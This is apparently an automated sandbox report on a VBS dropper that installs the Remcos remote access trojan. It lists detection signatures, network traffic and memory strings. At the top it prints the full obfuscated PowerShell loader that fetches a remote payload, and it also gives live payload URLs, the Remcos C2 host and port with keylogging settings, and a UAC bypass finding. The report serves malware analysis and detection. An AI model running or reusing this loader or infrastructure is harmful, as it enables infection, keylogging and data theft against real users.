                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [syst
                        Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6916, TargetFilename: C:\Users\user\AppData\Local\Temp\xx1.ps1

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Remcos
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2124, TargetFilename: C:\ProgramData\remcos\logs.dat

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T10:55:11.388506+020020204231Exploit Kit Activity Detected15.235.85.194443192.168.2.449732TCP
                        2024-09-26T10:55:31.026081+020020204231Exploit Kit Activity Detected15.235.85.194443192.168.2.449743TCP
                        2024-09-26T10:55:38.866932+020020204231Exploit Kit Activity Detected15.235.85.194443192.168.2.449746TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T10:55:11.388506+020020204241Exploit Kit Activity Detected15.235.85.194443192.168.2.449732TCP
                        2024-09-26T10:55:31.026081+020020204241Exploit Kit Activity Detected15.235.85.194443192.168.2.449743TCP
                        2024-09-26T10:55:38.866932+020020204241Exploit Kit Activity Detected15.235.85.194443192.168.2.449746TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T10:55:14.186081+020020365941Malware Command and Control Activity Detected192.168.2.449733173.208.241.1558888TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T10:55:10.411734+020028033053Unknown Traffic192.168.2.44973115.235.85.194443TCP
                        2024-09-26T10:55:11.212861+020028033053Unknown Traffic192.168.2.44973215.235.85.194443TCP
                        2024-09-26T10:55:30.032957+020028033053Unknown Traffic192.168.2.44974215.235.85.194443TCP
                        2024-09-26T10:55:30.849070+020028033053Unknown Traffic192.168.2.44974315.235.85.194443TCP
                        2024-09-26T10:55:37.895610+020028033053Unknown Traffic192.168.2.44974515.235.85.194443TCP
                        2024-09-26T10:55:38.692655+020028033053Unknown Traffic192.168.2.44974615.235.85.194443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-26T10:55:15.283452+020028033043Unknown Traffic192.168.2.449734178.237.33.5080TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXTAvira URL Cloud: Label: malware
                        Source: https://www.informacionoportuna.com/wp-content/uploads/2024/Avira URL Cloud: Label: malware
                        Source: https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txtAvira URL Cloud: Label: malware
                        Source: https://www.informacionoportuna.com/wp-content/uploads/2024/07/rAvira URL Cloud: Label: malware
                        Source: https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txtAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "special2023.duckdns.org:8888:1", "Assigned name": "Nlk", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3PWW8O", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                        Multi AV Scanner detection for submitted file
                        Source: sostener.vbsReversingLabs: Detection: 13%
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2124, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6852, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,27_2_00433837
                        Source: powershell.exe, 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_aa6e3a62-5

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b9a3da2420.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.23a4acf1928.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Contains functionality to bypass UAC (CMSTPLUA)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_004074FD _wcslen,CoGetObject,27_2_004074FD
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49741 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49742 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49744 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 15.235.85.194:443 -> 192.168.2.4:49745 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409253
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,27_2_0041C291
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,27_2_0040C34D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,27_2_00409665
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,27_2_0040880C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040783C FindFirstFileW,FindNextFileW,27_2_0040783C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,27_2_00419AF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,27_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,27_2_0040BD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,27_2_00407C97
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49733 -> 173.208.241.155:8888
                        Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 15.235.85.194:443 -> 192.168.2.4:49732
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 15.235.85.194:443 -> 192.168.2.4:49732
                        Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 15.235.85.194:443 -> 192.168.2.4:49746
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 15.235.85.194:443 -> 192.168.2.4:49746
                        Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 15.235.85.194:443 -> 192.168.2.4:49743
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 15.235.85.194:443 -> 192.168.2.4:49743
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: special2023.duckdns.org
                        Uses dynamic DNS services
                        Source: unknownDNS query: name: comandoespecial2023.duckdns.org
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 3.2.powershell.exe.29b32a20000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.23a3ac26860.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b993cd6900.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b1a88d8c0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.powershell.exe.1b994479a60.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b1bb69730.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.powershell.exe.23a3b3ccdd8.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.powershell.exe.29b1a9ee838.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2965204743.0000029B32A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: global trafficTCP traffic: 192.168.2.4:49733 -> 173.208.241.155:8888
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: HP-INTERNET-ASUS HP-INTERNET-ASUS
                        Source: Joe Sandbox ViewASN Name: WIIUS WIIUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49734 -> 178.237.33.50:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49743 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 15.235.85.194:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 15.235.85.194:443
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 27_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,27_2_0041B380
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/dllskyfal.txt HTTP/1.1Host: www.informacionoportuna.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/pesky.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/07/remcos.txt HTTP/1.1Host: www.informacionoportuna.com
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: www.informacionoportuna.com
                        Source: global trafficDNS traffic detected: DNS query: comandoespecial2023.duckdns.org
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1A99C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3AD38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B5B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B993DE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B994661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXT
                        Source: powershell.exe, 00000005.00000002.1972234119.0000020FEC49C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: powershell.exe, 00000005.00000002.1948374011.0000020FEC19B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                        Source: RegSvcs.exeString found in binary or memory: http://geoplugin.net/json.gp
                        Source: powershell.exe, 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                        Source: RegSvcs.exe, 00000008.00000002.3320747702.0000000001257000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                        Source: powershell.exe, 00000003.00000002.1814218663.0000029B1BAA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BD53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2063207589.0000023A3B308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2184970580.000001B9943B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://informacionoportuna.com
                        Source: powershell.exe, 00000003.00000002.2423857034.0000029B2A50B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1814218663.0000029B1BE64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1800597027.0000020F818B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896472311.0000020F9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A371C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1802652575.0000016894F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2003029726.00000168A3853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.0000029060DA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F572000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2669588783.000002906F43C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000009.00000002.1826959101.0000029060C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1826959101.00000290608BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
